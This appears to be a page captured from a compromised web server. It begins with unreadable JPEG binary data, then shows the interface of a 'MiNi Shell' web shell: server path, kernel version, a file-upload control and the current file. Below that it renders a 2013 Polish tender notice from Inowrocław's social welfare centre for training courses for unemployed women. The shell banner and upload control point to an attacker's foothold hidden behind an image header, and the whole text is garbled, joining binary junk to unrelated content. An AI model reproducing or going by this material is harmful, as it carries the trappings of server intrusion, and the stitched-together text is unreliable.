JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130426/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130426/64427-N-2013.html

<p class="kh_header"><b>Inowrocław: Usługi szkolenia na  kurs zawodowy Asystent osoby niepełnosprawnej oraz  Indywidualne doradztwo zawodowe i trening poruszania się na rynku pracy dla uczestniczek projektu Aktywni w Klubie realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.2. Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 64427 - 2013; data zamieszczenia: 26.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Św. Ducha 90, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 52 3571031, faks 52 3552450.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkolenia na  kurs zawodowy Asystent osoby niepełnosprawnej oraz  Indywidualne doradztwo zawodowe i trening poruszania się na rynku pracy dla uczestniczek projektu Aktywni w Klubie realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.2. Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi szkoleniowe polegające na  zorganizowaniu  i przeprowadzeniu   kursu zawodowego Asystent osoby niepełnosprawnej (zlecenie zadania merytorycznego) oraz Indywidualnego doradztwa zawodowego i treningu poruszania się na rynku pracy dla 15 długotrwale bezrobotnych kobiet uczestniczących w projekcie Aktywni w Klubie realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.2 Przeciwdziałanie wykluczeniu społecznemu i wzmocnienie sektora ekonomii Społecznej, Poddziałanie 7.2.1Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym, współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w tym:
Część 1 zamówienia  - Asystent osoby niepełnosprawnej dla 15 osób. Ilość godzin zajęć: 150 godzin zegarowych, w tym 80 godzin zajęć teoretycznych i 70 godzin zajęć praktycznych (w tym co najmniej 1 wizyta studyjna). 
Cel kursu zawodowego to m.in.: zdobycie umiejętności w zakresie pracy z osobami niepełnosprawnymi, w tym starszymi. Program nauczania ma być dostosowany do wykształcenia uczestniczek, tzn. co najmniej jeden dzień zajęć powinien być przeznaczony na: uwzględnienie treści dotyczących możliwości uzyskania tytułu zawodowego w zakresie asystentury osoby niepełnosprawnej; zaznajomienie uczestniczek z możliwościami związanymi z rozwojem i przyszłością ww. zawodu; motywowanie uczestniczek do zaplanowania ścieżki rozwoju zmierzającej do uzyskania tytułu zawodowego w zakresie asystenta osoby niepełnosprawnej. 
Część 2 zamówienia- Indywidualne doradztwo zawodowe i trening poruszania się na rynku pracy dla 15 osób. Ilość godzin zajęć: 78,75 godzin zegarowych, w tym - 60 godzin zegarowych indywidualnego doradztwa zawodowego (2 spotkania/osobę x 2 godziny zegarowe x 15 osób) oraz 25 godzin lekcyjnych treningu poruszania się na rynku pracy. 
Cele treningu poruszania się na rynku pracy:  
zdobycie wiedzy i umiejętności z zakresu metod poszukiwania pracy, autoprezentacji podczas rozmów kwalifikacyjnych, sporządzania dokumentów aplikacyjnych, motywowanie uczestniczek do uzupełnienia wykształcenia niezbędnego do zdobycia tytułu zawodowego w zakresie asystenta osoby niepełnosprawnej. 
Cele indywidualnego doradztwa zawodowego: 
- określenie (w formie ankiety i opinii) kwalifikacji zawodowych uczestniczki projektu    w kontekście kursu zawodowego - asystent osoby niepełnosprawnej i skierowania na staż zawodowy,  
- motywowanie chętnych osób do rozpoczęcia działalności w ramach podmiotów ekonomii społecznej.
2. Szczegółowy opis przedmiotu zamówienia i wymagania Zamawiającego są zawarte w załączniku nr 1 do SIWZ. 
Specyfikację istotnych warunków zamówienia wraz z załącznikami można pobrać w wersji elektronicznej ze strony internetowej Zamawiającego lub odebrać nieodpłatnie w siedzibie Zamawiającego - ul. Św. Ducha 90, 88-100 Inowrocław, w godz. 8.00-15.00 od poniedziałku do piątku lub drogą pocztową. Pobranie SIWZ ze strony internetowej Zamawiającego nie wymaga jej pobrania w wersji drukowanej.
3. Oznaczenie wg Wspólnego Słownika Zamówień (CPV): 80530000-8 usługi szkolenia zawodowego, 80500000-9 usługi szkoleniowe.
4. Zamawiający dopuszcza możliwość składania ofert częściowych na każdą z powyższych 2  części.
5. Obowiązkiem Wykonawcy (dotyczy wszystkich części zamówienia) jest:
5.1. Zorganizowanie i przeprowadzenie  usług szkoleniowych dla uczestniczek projektu.
5.2. Opracowanie programu zajęć.
5.3. Prowadzenie dokumentacji uczestniczek zajęć (w tym list obecności, dziennika zajęć).
5.4. Opracowanie ankiet ewaluacyjnych i dokonanie ich zbiorczej analizy.
5.5. Przekazanie dokumentacji, o której mowa w pkt. 5.4. w terminie 7 dni od dnia ukończenia zajęć.
5.6. Przedłożenie Zamawiającemu (w terminie 7 dni od dnia ukończenia zajęć) raportu z realizacji szkolenia, zgodnie z załącznikiem nr 8b do SIWZ.
5.7. Przestrzeganie przepisów o ochronie danych osobowych zgodnie z ustawą z dnia 29.09.1997 r., o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101, poz. 926, z późn. zm).
5.8. Zagwarantowanie odbywania się zajęć od poniedziałku do piątku:
a) dla części 1 - w godz. 8.00-16.30. 1 godzina szkolenia to 60 minut,
b) dla części 2 - w godz. 8.00-16.30. 1 godzina indywidualnego doradztwa zawodowego to 60 minut, jedna godzina treningu poruszania się na rynku pracy to 45 minut. 
Liczby godzin dla poszczególnych szkoleń, o których  mowa w SIWZ, nie uwzględnią przerw.
5.9. Umożliwienie przeprowadzenia kontroli. Zamawiający zastrzega sobie prawo do przeprowadzenia kontroli w trakcie szkolenia oraz fotografowania, filmowania itp.
5.10. Zapewnienie uczestniczkom stałej opieki w miejscu szkolenia. 
5.11. Przedłożenie Zamawiającemu (w terminie 7 dni od dnia ukończenia szkolenia) protokołu z realizacji kursu zgodnie z załącznikiem 8a do SIWZ).
6. Zamawiający przekaże wybranemu Wykonawcy imienną listę uczestniczek.
7. Wykonawca zobowiązuje się do zapoznania się z treścią następujących wytycznych: Wytyczne w zakresie kwalifikowania wydatków w ramach Programu Operacyjnego Kapitał Ludzki oraz Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz zobowiązuje się do wykonania zamówienia zgodnie ze wskazanymi w ww. dokumentach zasadami. 
Wytyczne należy pobrać ze strony www.ropstorun.pl w zakładce dokumenty do pobrania. 
8. Zamawiający, działając na podstawie art. 93 ust. 1 pkt 1a ustawy Prawo zamówień publicznych zastrzega możliwość unieważnienia przedmiotowego postępowania w przypadku, kiedy środki pochodzące z budżetu Unii Europejskiej, które zamierza przeznaczyć na sfinansowanie niniejszego zamówienia, nie zostaną mu przyznane..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-8, 80.53.00.00-9, 55.52.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 21.05.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali usługi szkoleniowe, polegające na zorganizowaniu i przeprowadzeniu szkoleń/ warsztatów/ kursów o zbliżonej tematyce do zamawianych, w tym: 
dla części 1 zamówienia co najmniej jednego w zakresie: asystent osoby niepełnosprawnej (lub o podobnej tematyce);
dla części 2 zamówienia co najmniej jednego w zakresie: indywidualnego doradztwa zawodowego i treningu poruszania się na rynku pracy (lub o podobnej tematyce)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia, w tym: 
dla części 1 zamówienia co najmniej jedną osobą posiadającą wykształcenie wyższe  oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o takiej samej lub podobnej tematyce. Spełnianie warunku zostanie ocenione na podstawie złożonego wykazu osób uczestniczących w wykonywaniu zamówienia oraz oświadczenia, że wymienione osoby posiadają wymagane wykształcenie i doświadczenie; na zasadzie spełnia/nie spełnia. 
dla części 2 zamówienia co najmniej jednym doradcą zawodowym  posiadającym uprawnienia wymagane prawem i doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o takiej samej lub podobnej tematyce.  Spełnianie warunku zostanie ocenione na podstawie złożonego wykazu osób uczestniczących w wykonywaniu zamówienia oraz oświadczenia, że wymienione osoby posiadają wymagane wykształcenie i doświadczenie; na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia, na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) opis programów oferowanych szkoleń z uwzględnieniem zakresu przedmiotu   zamówienia i wymagań Zamawiającego, wzór opisu -  zał. nr 10 do SIWZ,
2)  kalkulacja kosztów szkolenia, wg wzoru - zał. nr 9 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a. formularz ofertowy - wzór zał. nr 2 do SIWZ, b. Oświadczenie personelu projektu nr 1- zał.  nr 11  do SIWZ (dotyczy tylko Wykonawców,  o których mowa w  Zasadach finansowania w ramach Programu Operacyjnego Kapitał Ludzki  (str. 40) z dnia 24 grudnia 2012r. wydanych przez Ministerstwo Rozwoju Regionalnego http://www.efs.gov.pl/Dokumenty/ZmianyWDokumentach/Documents/Zasady_finansowania_271212.pdf ),
c. Oświadczenie personelu projektu nr 2 - zał.  nr 12  do SIWZ (dotyczy tylko Wykonawców,  o których mowa w  Zasadach finansowania w ramach Programu Operacyjnego Kapitał Ludzki  (str. 40) z dnia 24 grudnia 2012r. wydanych przez Ministerstwo Rozwoju Regionalnego http://www.efs.gov.pl/Dokumenty/ZmianyWDokumentach/Documents/Zasady_finansowania_271212.pdf ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie zawodowe - 50</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy,  w następujących przypadkach: a) zamawiający zastrzega zgodnie z art.145 ustawy, iż w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach;
b) zmiany ilości uczestniczek szkoleń, w przypadku przerwania lub zakończenia przez uczestniczkę udziału w projekcie lub z powodu innych okoliczności uniemożliwiających uczestniczkom szkolenia udział w zajęciach. 
c) zmiany terminów wykonania szkoleń, z przyczyn nie leżących po stronie Wykonawcy;
d) zmiany harmonogramów w uzasadnionych przypadkach;
e) zmiana warunków finansowania;
f) zmiany programów szkoleń, w uzasadnionych przypadkach;
g) zmiany podatku od towarów i usług VAT;
h) zmiany osób przeprowadzających szkolenie w uzasadnionych wypadkach, z tym, że inne osoby nie mogą posiadać  niższych kwalifikacji.
2. Warunkiem wprowadzenia ww. zmian będzie pisemne uzasadnienie wprowadzenia ww. zmian. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron w formie pisemnej zastrzeżonej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopsinowroclaw.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
ul. Św. Ducha 90
88-100 Inowrocław
pokój 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2013 godzina 08:30, miejsce: Miejski Ośrodek Pomocy Społecznej
ul. Św. Ducha 90
88-100 Inowrocław
pokój 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt Aktywni w Klubie realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.2. Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym, współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Asystent osoby niepełnosprawnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompleksowej usługi wraz z przygotowaniem programu zajęć i materiałów szkoleniowych na kurs zawodowy Asystent osoby niepełnosprawnej dla 15 kobiet długotrwale bezrobotnych. Ilość osób do przeszkolenia: 15.  Informacja o uczestnikach szkolenia: (Zamawiający przewiduje  możliwość zmiany ilości uczestników szkolenia w przypadku przerwania lub zakończenia udziału w projekcie lub z powodu innych okoliczności uniemożliwiających uczestniczkom szkolenia udział w zajęciach.). Liczba godzin: 150 godzin zegarowych, w tym 80 godzin zajęć teoretycznych i 70 godzin zajęć praktycznych (w tym co najmniej 1 wizyta studyjna). Terminy zajęć ze wskazaniem  na poszczególne dni: 1-26 lipca 2013 r. (bez 5 lipca 2013 r.). Cel kursu zawodowego to m.in.: zdobycie umiejętności w zakresie pracy z osobami niepełnosprawnymi, w tym starszymi. Program nauczania ma być dostosowany do wykształcenia uczestniczek, tzn. co najmniej jeden dzień zajęć powinien być przeznaczony na: uwzględnienie treści dotyczących możliwości uzyskania tytułu zawodowego w zakresie asystentury osoby niepełnosprawnej; zaznajomienie uczestniczek z możliwościami związanymi z rozwojem i przyszłością ww. zawodu; motywowanie uczestniczek do zaplanowania ścieżki rozwoju zmierzającej do uzyskania tytułu zawodowego zakresie asystenta osoby niepełnosprawnej. Terminy zajęć: 1-26 lipca 2013 r.Miejsce szkolenia: siedziba KIS w Inowrocławiu przy ul. Św. Ducha 90. Zamawiający nieodpłatnie zapewnia pomieszczenia w ww. siedzibie KIS. Prowadzący szkolenie: co najmniej jedna osoba posiadająca wykształcenie wyższe  oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o takiej samej lub podobnej tematyce. Materiały dydaktyczne i inne wymagania Zamawiającego: Uczestniczki kursu muszą otrzymać m.in. skrypty, fartuch, rękawice i inne niezbędne materiały. Materiały niezbędne do realizacji szkolenia  można skserować  w siedzibie MOPS.Uczestniczki muszą mieć przeprowadzone stosowne badania i zostać ubezpieczone od następstw nieszczęśliwych wypadków. Należy zapewnić im poczęstunek: bufet kawowy. Wykonawca musi dostarczyć Zamawiającemu pisemne potwierdzenia odbioru przez uczestniczki ww. materiałów. Jeden zestaw ww. materiałów dla Zamawiającego celem dołączenia do dokumentacji.Działania promocyjne: Wizualizacja zajęć zgodnie z wytycznymi w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki (PO KL),  które są dostępne pod adresem www.efs.gov.pl. Wykonawca zobowiązany jest do informowania, że szkolenie organizowane jest w ramach projektu Miejskiego Ośrodka Pomocy Społecznej w Inowrocławiu ze środków  Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Zaświadczenia: Wykonawca wydrukuje  i wyda w dniu ukończenia zajęć wszystkim uczestniczkom zaświadczenia imienne o ukończeniu szkolenia z wyszczególnieniem liczby godzin, zakresu poruszanych zagadnień oraz doskonalonych umiejętności. Wzór 